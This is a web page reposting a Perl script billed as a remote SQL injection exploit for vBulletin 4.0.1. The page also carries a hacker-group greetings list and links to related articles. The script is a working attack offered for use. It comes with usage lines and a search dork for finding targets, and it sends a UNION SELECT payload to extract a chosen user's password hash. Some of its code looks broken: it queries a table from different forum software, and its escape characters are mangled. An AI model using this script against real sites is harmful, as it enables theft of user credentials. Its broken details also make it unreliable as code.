vBulletin version 4.0.1 remote SQL injection exploit

简介: #!/usr/bin/perl use IO::Socket; print q{ ##############################################...
#!/usr/bin/perl 
 
use IO::Socket; 
 
 
print q{ 
#######################################################################
#    vBulletin� Version 4.0.1 Remote SQL Injection Exploit            #
#                      By indoushka                                   #
#                     www.iq-ty.com/vb                                #
#               Souk Naamane  (00213771818860)                        #
#           Algeria Hackerz (indoushka@hotmail.com)                   # 
#          Dork: Powered by vBulletin� Version 4.0.1                  #            
####################################################################### 
}; 
 
if (!$ARGV[2]) { 
 
print q{ 
	Usage: perl  VB4.0.1.pl host /directory/ victim_userid 
 
       perl  VB4.0.1.pl www.vb.com /forum/ 1 
 
 
}; 
 
} 
 
 
$server = $ARGV[0]; 
$dir    = $ARGV[1]; 
$user   = $ARGV[2]; 
$myuser = $ARGV[3]; 
$mypass = $ARGV[4]; 
$myid   = $ARGV[5]; 
 
print "------------------------------------------------------------------------------------------------/r/n"; 
print "[>] SERVER: $server/r/n"; 
print "[>]    DIR: $dir/r/n"; 
print "[>] USERID: $user/r/n"; 
print "------------------------------------------------------------------------------------------------/r/n/r/n"; 
 
$server =~ s/(http:////)//eg; 
 
$path  = $dir; 
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ; 
 
 
print "[~] PREPARE TO CONNECT.../r/n"; 
 
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; 
 
print "[+] CONNECTED/r/n"; 
print "[~] SENDING QUERY.../r/n"; 
print $socket "GET $path HTTP/1.1/r/n"; 
print $socket "Host: $server/r/n"; 
print $socket "Accept: */*/r/n"; 
print $socket "Connection: close/r/n/r/n"; 
print "[+] DONE!/r/n/r/n"; 
 
 
 
print "--[ REPORT ]------------------------------------------------------------------------------------/r/n"; 
while ($answer = <$socket>) 
{ 
 
 if ($answer =~/(/w{32})/) 
{ 
 
  if ($1 ne 0) { 
   print "Password is: ".$1."/r/n"; 
print "--------------------------------------------------------------------------------------/r/n"; 
 
      } 
exit(); 
} 
 
} 
print "------------------------------------------------------------------------------------------------/r/n";

================================   Dz-Ghost Team   ========================================================
Greetz : ���� ����� ����� ���� ������ 22 + ��� ����� + ��� ����� + ��� ������ + ��� �������
+ ��� ������ + ��� ������ +��� ����� + ��� ���� +��� ������ + ��� ��� ������ + ��� �����
Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.forums.ibb7.com * www.owned-m.com *Stake (v4-team.com) * www.dev-chat.com  * Cyb3r IntRue (avengers team) 
* www.securityreason.com * www.packetstormsecurity.org * www.best-sec.net * www.zone-h.net * www.m-y.cc 
* www.hacker.ps * no-exploit.com * www.bug-blog.de * www.bawassil.com * www.host4ll.com * www.xp10.me 
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com) * www.kadmiwe.net
SoldierOfAllah (www.m4r0c-s3curity.cc) * www.arhack.net * www.google.com * www.sec-eviles.com    
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.arabic-m.com * www.securitywall.org 
r1z (www.sec-r1z.com) * www.zac003.persiangig.ir * www.0xblackhat.ir * www.mormoroth.net 
------------------------------------------------------------------------------------------------------------
目录
相关文章
|
11天前
|
SQL Oracle Java
SQL 注入神器:jSQL Injection 保姆级教程
SQL 注入神器:jSQL Injection 保姆级教程
|
25天前
|
SQL 安全 数据库
[dvwa] sql injection
[dvwa] sql injection
|
25天前
|
SQL 安全 数据库
[dvwa] sql injection(Blind)
[dvwa] sql injection(Blind)
|
7月前
|
SQL Java 数据库连接
sql injection violation, syntax error: syntax error, error in :‘**‘expect IDENTIFIER, actual IDENTIF
sql injection violation, syntax error: syntax error, error in :‘**‘expect IDENTIFIER, actual IDENTIF
121 0
java.sql.SQLException: sql injection violation
本文目录 1. 报错信息 2. 问题分析 3. 排除法 4. 解决方案
2028 0
|
SQL 安全 关系型数据库
DVWA-SQL注入(SQL Injection)低/中/高级别
DVWA是一个用来联系渗透的靶场,其中包含数个漏洞模块,本篇博客向大家简单介绍下SQL注入(SQL Injection)模块三个级别(low/medium/high)的通关步骤
1178 2
DVWA-SQL注入(SQL Injection)低/中/高级别
|
SQL 安全 Linux
kali linux 网络渗透测试学习笔记(二)OWASP ZAP工具扫描SQL injection漏洞失败
按照惯例,利用OWASP ZAP工具扫描SQL injection漏洞时,应该很快就可以扫描出来,但是在笔者进行扫描的时候,却遇到了以下状况: 这说明了该工具根本就没能够扫描出SQL注入的漏洞,不知道该如何解决。
2217 0
|
SQL 关系型数据库 Java